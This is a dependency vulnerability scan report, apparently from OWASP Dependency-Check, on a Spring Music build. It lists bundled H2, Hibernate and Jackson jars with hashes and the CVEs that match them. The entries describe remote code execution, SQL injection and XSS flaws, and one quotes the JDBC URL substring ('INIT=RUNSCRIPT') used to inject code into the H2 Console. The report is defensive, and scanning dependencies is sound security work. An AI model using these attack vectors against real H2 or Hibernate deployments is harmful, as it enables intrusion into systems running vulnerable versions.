af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve-coordination@google.com - EXPLOIT,PATCH,THIRD_PARTY_ADVISORY cve-coordination@google.com - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve-coordination@google.com - PATCH,THIRD_PARTY_ADVISORY cve-coordination@google.com - PATCH,THIRD_PARTY_ADVISORY cve-coordination@google.com - PATCH,THIRD_PARTY_ADVISORY cve-coordination@google.com - PATCH,THIRD_PARTY_ADVISORY cve-coordination@google.com - PATCH,THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY cve-coordination@google.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: h2-1.4.197.jarDescription:
H2 Database Engine License:
MPL 2.0 or EPL 1.0: http://h2database.com/html/license.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/h2-1.4.197.jar
MD5: f9893acfa22b7fe1492dd9c515af2e5b
SHA1: bb391050048ca8ae3e32451b5a3714ecd3596a46
SHA256: 37f5216e14af2772930dff9b8734353f0a80e89ba3f33e065441de6537c5e842
Evidence Type Source Name Value Confidence Vendor central artifactid h2 Highest Vendor central groupid com.h2database Highest Vendor file name h2 High Vendor jar package name h2 Highest Vendor jar package name h2 Low Vendor jar package name org Highest Vendor Manifest bundle-category jdbc Low Vendor Manifest bundle-symbolicname org.h2 Medium Vendor Manifest implementation-url http://www.h2database.com Low Vendor Manifest multi-release true Low Vendor Manifest provide-capability osgi.service;objectClass:List=org.osgi.service.jdbc.DataSourceFactory Low Vendor pom artifactid h2 Low Vendor pom developer email thomas.tom.mueller at gmail dot com Low Vendor pom developer id thomas.tom.mueller Medium Vendor pom developer name Thomas Mueller Medium Vendor pom groupid com.h2database Highest Vendor pom name H2 Database Engine High Vendor pom url http://www.h2database.com Highest Product central artifactid h2 Highest Product file name h2 High Product jar package name database Highest Product jar package name engine Highest Product jar package name h2 Highest Product jar package name jdbc Highest Product jar package name org Highest Product jar package name service Highest Product Manifest bundle-category jdbc Low Product Manifest Bundle-Name H2 Database Engine Medium Product Manifest bundle-symbolicname org.h2 Medium Product Manifest Implementation-Title H2 Database Engine High Product Manifest implementation-url http://www.h2database.com Low Product Manifest multi-release true Low Product Manifest provide-capability osgi.service;objectClass:List=org.osgi.service.jdbc.DataSourceFactory Low Product pom artifactid h2 Highest Product pom developer email thomas.tom.mueller at gmail dot com Low Product pom developer id thomas.tom.mueller Low Product pom developer name Thomas Mueller Low Product pom groupid com.h2database Highest Product pom name H2 Database Engine High Product pom url http://www.h2database.com Medium Version central version 1.4.197 Highest Version file version 1.4.197 High Version Manifest Bundle-Version 1.4.197 High Version Manifest Implementation-Version 1.4.197 High Version pom version 1.4.197 Highest
CVE-2021-42392 suppress
The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console which leads to unauthenticated remote code execution. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (10.0) Vector: /AV:N/AC:L/Au:N/C:C/I:C/A:C References:
OSSINDEX - [CVE-2021-42392] CWE-502: Deserialization of Untrusted Data OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42392 OSSIndex - https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY reefs@jfrog.com - EXPLOIT,TECHNICAL_DESCRIPTION,VENDOR_ADVISORY reefs@jfrog.com - MAILING_LIST,THIRD_PARTY_ADVISORY reefs@jfrog.com - MITIGATION,THIRD_PARTY_ADVISORY reefs@jfrog.com - PATCH,THIRD_PARTY_ADVISORY reefs@jfrog.com - THIRD_PARTY_ADVISORY reefs@jfrog.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-23221 suppress
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392. CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (10.0) Vector: /AV:N/AC:L/Au:N/C:C/I:C/A:C References:
OSSINDEX - [CVE-2022-23221] CWE-88: Argument Injection or Modification OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23221 OSSIndex - https://github.com/advisories/GHSA-45hx-wfhj-473x OSSIndex - https://github.com/h2database/h2database/releases/tag/version-2.1.210 OSSIndex - https://seclists.org/fulldisclosure/2022/Jan/39 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MITIGATION,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - NOT_APPLICABLE cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-10054 suppress
H2 1.4.197, as used in Datomic before 0.9.5697 and other products, allows remote code execution because CREATE ALIAS can execute arbitrary Java code. NOTE: the vendor's position is "h2 is not designed to be run outside of a secure environment." CWE-20 Improper Input Validation
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2022-45868 suppress
The web-based admin console in H2 Database Engine before 2.2.220 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states "This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that." Nonetheless, the issue was fixed in 2.2.220. CWE-312 Cleartext Storage of Sensitive Information
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2018-14335 suppress
An issue was discovered in H2 1.4.197. Insecure handling of permissions in the backup function allows attackers to read sensitive files (outside of their permissions) via a symlink to a fake database file. CWE-276 Incorrect Default Permissions, CWE-59 Improper Link Resolution Before File Access ('Link Following')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: h2-1.4.197.jar: data.zip: table.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/h2-1.4.197.jar/org/h2/util/data.zip/org/h2/server/web/res/table.jsMD5: 4438d0c12097dae5f3fabd1290c16ec8SHA1: f8016b15b9e89501baf51e5d9b532da37c21a226SHA256: d76db45139f9f2beea3afcc1e24437efea061037956c1238d7bb3a4810fae691
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: h2-1.4.197.jar: data.zip: tree.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/h2-1.4.197.jar/org/h2/util/data.zip/org/h2/server/web/res/tree.jsMD5: fb35bd0b4542444661eece734b5a091eSHA1: e9d387e5abc95c53525b2cf437abca69338e8c9aSHA256: c0aebf5f276372fa483c7ce5faab50401bf6a75a929ac9c0e072aa23c17b5935
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: hibernate-commons-annotations-5.0.1.Final.jarDescription:
Common reflection code used in support of annotation processing License:
GNU Lesser General Public License: http://www.gnu.org/licenses/lgpl-2.1.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/hibernate-commons-annotations-5.0.1.Final.jar
MD5: 2a9d6f5a4ece96557bc4300ecc4486fb
SHA1: 71e1cff3fcb20d3b3af4f3363c3ddb24d33c6879
SHA256: 9431ca05c335f9b6ec550f5d65ad56047a5f336e2d41cce4067591d20c4e51df
Evidence Type Source Name Value Confidence Vendor central artifactid hibernate-commons-annotations Highest Vendor central groupid org.hibernate.common Highest Vendor file name hibernate-commons-annotations High Vendor hint analyzer vendor redhat Highest Vendor jar package name annotations Highest Vendor jar package name annotations Low Vendor jar package name common Highest Vendor jar package name common Low Vendor jar package name hibernate Highest Vendor jar package name hibernate Low Vendor Manifest bundle-symbolicname org.hibernate.common.hibernate-commons-annotations Medium Vendor Manifest implementation-url http://hibernate.org Low Vendor Manifest Implementation-Vendor Hibernate.org High Vendor Manifest Implementation-Vendor-Id org.hibernate Medium Vendor pom artifactid hibernate-commons-annotations Low Vendor pom developer id hibernate-team Medium Vendor pom developer name The Hibernate Development Team Medium Vendor pom developer org Hibernate.org Medium Vendor pom developer org URL http://hibernate.org Medium Vendor pom groupid org.hibernate.common Highest Vendor pom name Hibernate Commons Annotations High Vendor pom organization name Hibernate.org High Vendor pom organization url http://hibernate.org Medium Vendor pom url http://hibernate.org Highest Product central artifactid hibernate-commons-annotations Highest Product file name hibernate-commons-annotations High Product jar package name annotations Highest Product jar package name annotations Low Product jar package name common Highest Product jar package name common Low Product jar package name hibernate Highest Product jar package name reflection Low Product Manifest Bundle-Name hibernate-commons-annotations Medium Product Manifest bundle-symbolicname org.hibernate.common.hibernate-commons-annotations Medium Product Manifest implementation-url http://hibernate.org Low Product pom artifactid hibernate-commons-annotations Highest Product pom developer id hibernate-team Low Product pom developer name The Hibernate Development Team Low Product pom developer org Hibernate.org Low Product pom developer org URL http://hibernate.org Low Product pom groupid org.hibernate.common Highest Product pom name Hibernate Commons Annotations High Product pom organization name Hibernate.org Low Product pom organization url http://hibernate.org Low Product pom url http://hibernate.org Medium Version central version 5.0.1.Final Highest Version Manifest Bundle-Version 5.0.1.Final High Version Manifest Implementation-Version 5.0.1.Final High Version pom version 5.0.1.Final Highest
spring-music-sqldb-1.0.jar: hibernate-core-5.2.16.Final.jarDescription:
The core O/RM functionality as provided by Hibernate License:
GNU Lesser General Public License: http://www.gnu.org/licenses/lgpl-2.1.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/hibernate-core-5.2.16.Final.jar
MD5: 2020bbd44c74afb12d2e73b8ae20bcd4
SHA1: c169565556721e21e9bdc193a3e8e25160a45468
SHA256: 89312da2f524e0a232610d7452c2ef8c1183ca5955f3ee7690954c872e098d31
Evidence Type Source Name Value Confidence Vendor central artifactid hibernate-core Highest Vendor central groupid org.hibernate Highest Vendor file name hibernate-core High Vendor hint analyzer vendor redhat Highest Vendor jar package name hibernate Highest Vendor jar package name hibernate Low Vendor Manifest bundle-symbolicname org.hibernate.core Medium Vendor Manifest implementation-url http://hibernate.org Low Vendor Manifest Implementation-Vendor Hibernate.org High Vendor Manifest Implementation-Vendor-Id org.hibernate Medium Vendor Manifest specification-vendor Hibernate.org Low Vendor pom artifactid hibernate-core Low Vendor pom developer id hibernate-team Medium Vendor pom developer name The Hibernate Development Team Medium Vendor pom developer org Hibernate.org Medium Vendor pom developer org URL http://hibernate.org Medium Vendor pom groupid org.hibernate Highest Vendor pom name Core Hibernate O/RM functionality High Vendor pom organization name Hibernate.org High Vendor pom organization url http://hibernate.org Medium Vendor pom url http://hibernate.org Highest Product central artifactid hibernate-core Highest Product file name hibernate-core High Product hint analyzer product orm Highest Product jar package name hibernate Highest Product Manifest Bundle-Name hibernate-core Medium Product Manifest bundle-symbolicname org.hibernate.core Medium Product Manifest Implementation-Title hibernate-core High Product Manifest implementation-url http://hibernate.org Low Product Manifest specification-title hibernate-core Medium Product pom artifactid hibernate-core Highest Product pom developer id hibernate-team Low Product pom developer name The Hibernate Development Team Low Product pom developer org Hibernate.org Low Product pom developer org URL http://hibernate.org Low Product pom groupid org.hibernate Highest Product pom name Core Hibernate O/RM functionality High Product pom organization name Hibernate.org Low Product pom organization url http://hibernate.org Low Product pom url http://hibernate.org Medium Version central version 5.2.16.Final Highest Version Manifest Bundle-Version 5.2.16.Final High Version Manifest Implementation-Version 5.2.16.Final High Version pom version 5.2.16.Final Highest
CVE-2020-25638 suppress
A flaw was found in hibernate-core in versions prior to and including 5.4.23.Final. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity. CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3:
Base Score: HIGH (7.4) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N References:
OSSINDEX - [CVE-2020-25638] CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25638 OSSIndex - https://bugzilla.redhat.com/show_bug.cgi?id=1881353 OSSIndex - https://hibernate.atlassian.net/browse/HHH-14225 af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY secalert@redhat.com - ISSUE_TRACKING,THIRD_PARTY_ADVISORY secalert@redhat.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - PATCH,THIRD_PARTY_ADVISORY secalert@redhat.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-14900 suppress
A flaw was found in Hibernate ORM in versions before 5.3.18, 5.4.18 and 5.5.0.Beta1. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: hibernate-jpa-2.1-api-1.0.0.Final.jarDescription:
Clean-room definition of JPA APIs intended for use in developing Hibernate JPA implementation. See README.md for details License:
Eclipse Public License (EPL), Version 1.0: http://www.eclipse.org/legal/epl-v10.html
Eclipse Distribution License (EDL), Version 1.0: http://www.eclipse.org/org/documents/edl-v10.php File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/hibernate-jpa-2.1-api-1.0.0.Final.jar
MD5: 01b091825023c97fdfd6d2bceebe03ff
SHA1: 5e731d961297e5a07290bfaf3db1fbc8bbbf405a
SHA256: ab46597e3a057f99c8339fffe14c1d27f9dbd2409ae840c62121b00d983c78bd
Evidence Type Source Name Value Confidence Vendor central artifactid hibernate-jpa-2.1-api Highest Vendor central groupid org.hibernate.javax.persistence Highest Vendor file name hibernate-jpa-2.1-api-1.0.0.Final High Vendor hint analyzer vendor redhat Highest Vendor jar package name javax Highest Vendor jar package name javax Low Vendor jar package name persistence Highest Vendor jar package name persistence Low Vendor Manifest bundle-symbolicname org.hibernate.javax.persistence.hibernate-jpa-2.1-api Medium Vendor Manifest Implementation-Vendor hibernate.org High Vendor pom artifactid hibernate-jpa-2.1-api Low Vendor pom developer email emmanuel@hibernate.org Low Vendor pom developer email hferents@redhat.com Low Vendor pom developer email steve@hibernate.org Low Vendor pom developer id epbernard Medium Vendor pom developer id hardy.ferentschik Medium Vendor pom developer id sebersole Medium Vendor pom developer name Emmanuel Bernard Medium Vendor pom developer name Hardy Ferentschik Medium Vendor pom developer name Steve Ebersole Medium Vendor pom developer org Red Hat, Inc. Medium Vendor pom groupid org.hibernate.javax.persistence Highest Vendor pom name Java Persistence API, Version 2.1 High Vendor pom url http://hibernate.org Highest Product central artifactid hibernate-jpa-2.1-api Highest Product file name hibernate-jpa-2.1-api-1.0.0.Final High Product jar package name javax Highest Product jar package name persistence Highest Product jar package name persistence Low Product jar package name version Highest Product Manifest Bundle-Name hibernate-jpa-2.1-api Medium Product Manifest bundle-symbolicname org.hibernate.javax.persistence.hibernate-jpa-2.1-api Medium Product Manifest Implementation-Title Java Persistence API High Product Manifest specification-title Java Persistence API, Version 2.1 Medium Product pom artifactid hibernate-jpa-2.1-api Highest Product pom developer email emmanuel@hibernate.org Low Product pom developer email hferents@redhat.com Low Product pom developer email steve@hibernate.org Low Product pom developer id epbernard Low Product pom developer id hardy.ferentschik Low Product pom developer id sebersole Low Product pom developer name Emmanuel Bernard Low Product pom developer name Hardy Ferentschik Low Product pom developer name Steve Ebersole Low Product pom developer org Red Hat, Inc. Low Product pom groupid org.hibernate.javax.persistence Highest Product pom name Java Persistence API, Version 2.1 High Product pom url http://hibernate.org Medium Version central version 1.0.0.Final Highest Version Manifest Bundle-Version 1.0.0.Final High Version Manifest Implementation-Version 1.0.0.Final High Version pom version 1.0.0.Final Highest
spring-music-sqldb-1.0.jar: hibernate-validator-6.0.9.Final.jarDescription:
Hibernate's Bean Validation (JSR-380) reference implementation. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/hibernate-validator-6.0.9.Final.jar
MD5: 6250c442411c5d0c7ba6fe3ca9935ea7
SHA1: b149e4cce82379f11f6129eb3187ca8ae5404005
SHA256: be05d5979abb40f804c35e2d67ffd950eb22dab9bd2bd618618bcc726264b022
Evidence Type Source Name Value Confidence Vendor file name hibernate-validator High Vendor hint analyzer vendor redhat Highest Vendor jar package name engine Highest Vendor jar package name hibernate Highest Vendor jar package name validator Highest Vendor Manifest automatic-module-name org.hibernate.validator Medium Vendor Manifest bundle-symbolicname org.hibernate.validator.hibernate-validator Medium Vendor Manifest implementation-url http://hibernate.org/validator/ Low Vendor Manifest Implementation-Vendor org.hibernate.validator High Vendor Manifest Implementation-Vendor-Id org.hibernate.validator Medium Vendor pom artifactid hibernate-validator Low Vendor pom groupid org.hibernate.validator Highest Vendor pom name Hibernate Validator Engine High Vendor pom parent-artifactid hibernate-validator-parent Low Product file name hibernate-validator High Product jar package name engine Highest Product jar package name hibernate Highest Product jar package name validator Highest Product Manifest automatic-module-name org.hibernate.validator Medium Product Manifest Bundle-Name Hibernate Validator Engine Medium Product Manifest bundle-symbolicname org.hibernate.validator.hibernate-validator Medium Product Manifest Implementation-Title hibernate-validator High Product Manifest implementation-url http://hibernate.org/validator/ Low Product Manifest specification-title Bean Validation Medium Product pom artifactid hibernate-validator Highest Product pom groupid org.hibernate.validator Highest Product pom name Hibernate Validator Engine High Product pom parent-artifactid hibernate-validator-parent Medium Version Manifest Bundle-Version 6.0.9.Final High Version Manifest Implementation-Version 6.0.9.Final High Version pom version 6.0.9.Final Highest
CVE-2025-35036 (OSSINDEX) suppress
Hibernate Validator before 6.2.0 and 7.0.0, by default and depending how it is used, may interpolate user-supplied input in a constraint violation message with Expression Language. This could allow an attacker to access sensitive information or execute arbitrary Java code. Hibernate Validator as of 6.2.0 and 7.0.0 no longer interpolates custom constraint violation messages with Expression Language and strongly recommends not allowing user-supplied input in constraint violation messages. CVE-2020-5245 and CVE-2025-4428 are examples of related, downstream vulnerabilities involving Expression Language intepolation of user-supplied data. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv2:
Base Score: MEDIUM (6.900000095367432) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.hibernate.validator:hibernate-validator:6.0.9.Final:*:*:*:*:*:*:* CVE-2019-10219 suppress
A vulnerability was found in Hibernate-Validator. The SafeHtml validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions. This vulnerability can result in an XSS attack. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-1932 suppress
A flaw was found in hibernate-validator's 'isValid' method in the org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator class, which can be bypassed by omitting the tag ending in a less-than character. Browsers may render an invalid html, allowing HTML injection or Cross-Site-Scripting (XSS) attacks. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2020-10693 suppress
A flaw was found in Hibernate Validator version 6.1.2.Final. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: jackson-annotations-2.9.0.jarDescription:
Core annotations used for value types, used by Jackson data binding package.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-annotations-2.9.0.jar
MD5: c09faa1b063681cf45706c6df50685b6
SHA1: 07c10d545325e3a6e72e06381afe469fd40eb701
SHA256: 45d32ac61ef8a744b464c54c2b3414be571016dd46bfc2bec226761cf7ae457a
Evidence Type Source Name Value Confidence Vendor file name jackson-annotations High Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor Manifest bundle-docurl http://github.com/FasterXML/jackson Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-annotations Medium Vendor Manifest implementation-build-date 2017-07-30 03:53:23+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.core Medium Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-annotations Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name Jackson-annotations High Vendor pom parent-artifactid jackson-parent Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url http://github.com/FasterXML/jackson Highest Product file name jackson-annotations High Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product Manifest bundle-docurl http://github.com/FasterXML/jackson Low Product Manifest Bundle-Name Jackson-annotations Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-annotations Medium Product Manifest implementation-build-date 2017-07-30 03:53:23+0000 Low Product Manifest Implementation-Title Jackson-annotations High Product Manifest specification-title Jackson-annotations Medium Product pom artifactid jackson-annotations Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name Jackson-annotations High Product pom parent-artifactid jackson-parent Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url http://github.com/FasterXML/jackson Medium Version file version 2.9.0 High Version Manifest Bundle-Version 2.9.0 High Version Manifest Implementation-Version 2.9.0 High Version pom version 2.9.0 Highest
CVE-2018-1000873 suppress
Fasterxml Jackson version Before 2.9.8 contains a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in Causes a denial-of-service (DoS). This attack appear to be exploitable via The victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
